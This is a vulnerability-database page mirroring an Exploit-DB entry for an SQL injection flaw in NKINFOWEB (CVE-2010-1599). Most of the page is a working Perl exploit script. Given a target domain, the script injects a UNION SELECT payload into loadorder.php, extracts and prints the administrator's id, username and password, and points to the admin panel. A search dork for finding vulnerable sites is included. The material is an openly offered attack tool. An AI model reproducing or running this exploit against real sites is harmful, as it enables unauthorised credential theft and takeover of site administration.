Lucene search
+L

NKINFOWEB - SQL Injection

🗓️ 23 Apr 2010 00:00:00Reported by d4rk-h4ck3rType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

NKINFOWEB SQL Injection exploit for remote admin credentials retrieva

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2010-1599
29 Apr 201017:00
cve
cvelist
Cvelist
CVE-2010-1599
29 Apr 201017:00
cvelist
euvd
EUVD
EUVD-2010-1625
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-1599
29 Apr 201017:30
nvd
prion
Prion
Sql injection
29 Apr 201017:30
prion
# Software Link: http://jaist.dl.sourceforge.net/project/nkinfoweb/FunctionNkinfoweb_v.species.rar
# Tested on: several linux versions

#=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+



#!/usr/bin/perl
 use strict;
 use LWP::Simple;

print "\n";
print "##############################################################\n";
print "# NKINFOWEB SQL INJECTION EXPLOIT                            #\n";
print "# Author: d4rk-h4ck3r  (Tunisian Security Team)              #\n";
print "# Greetz to Passeword & Maxilog & all vbspiders members      #\n";
print "# Dork: Powered by NKINFOWEB VSp © 2009                      #\n";
print "##############################################################\n";

 my $domain = shift @ARGV or banner();
 my $injsql ="/loadorder.php?id_sp=-17+union+select+1,2,3,concat(0x3a3a3a,id_usersys,0x3a,usersys,0x3a,pwdsys,0x3a3a3a),5,6,7,8,9,10,11+from+usersys--";

 if(get($domain.$injsql) =~ /:::(.+):(.+):(.+):::/)
 {
   print "\n[+] Exploit Succesfull!";
   print "\n[+] Admin id: : $1";
   print "\n[+] Admin username: $2";
   print "\n[+] Admin password: $3";
   print "\n[+] Admin panel: $domain/administrator/ ";}
 else
 {
   print "[!] Exploit Failed!\n";
   print "[!] Site Not Vulnerable!\n";
 }

 sub banner
 {
   print "[+] NKINFOWEB <= Remote SQL Injection Exploit\n";
   print "[+] Usage: ${0} http://[host]\n";
   return exit;
 }

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Apr 2010 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.00973
40